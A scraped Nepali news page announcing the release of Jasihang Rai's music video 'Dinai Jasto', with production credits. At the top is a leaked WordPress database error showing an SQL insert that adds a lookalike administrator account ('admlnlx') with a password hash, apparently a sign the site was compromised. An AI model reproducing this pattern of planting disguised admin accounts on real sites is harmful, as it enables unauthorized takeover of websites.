WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BAGAMmrMW0HTNJcM63QUJE05ayIHhj0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 11:31:28', '', 'admlnlx', 'admlnlx')

गायक तथा सगीतकार जसिहाङ राईको दिनै जस्तो.. म्युजिम भिडियो सार्वजनिक – Gaule Khabar

गायक तथा सगीतकार जसिहाङ राईको दिनै जस्तो.. म्युजिम भिडियो सार्वजनिक

गायक तथा सगीतकार जसिहाङ राईको दिनै जस्तो.. म्युजिम भिडियो सार्वजनिक

गाउँले न्यूज, ११ बैशाख, काठमाण्डौं । गायक तथा सगीतकार जसिहाङ राईको दिनै जस्तो.. गितको म्युजिम भिडियो सार्वजनिक भएको छ ।
अर्थभित्र एल्बममा रहेको उक्त गीतमा तुलसा बस्नेतको शब्द सचिन सिङको संगीत जसिहाङ राईले स्वर दिएका छन् ।
गाउँले इन्टरटेनमेन्टको ब्यानरमा निर्माण भएको उक्त म्युजिक भिडियो गाउँले इन्टरटेनमेन्टको युटुब च्यानलबाट आज सार्वजनिक गरिएको छ ।
म्युजिक भिडियोमा देभराज गुरुङ, सुमन तामाङ, अनिशा श्रेष्ठ र संगिता तामाङले फिचरिङ हेर्न सकिन्छ भने भिडियोे निर्देशन देबराज गुरुङ, क्यामारा तथा भिडियो सम्पादन गंगारमा राईले गरेका छन् ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका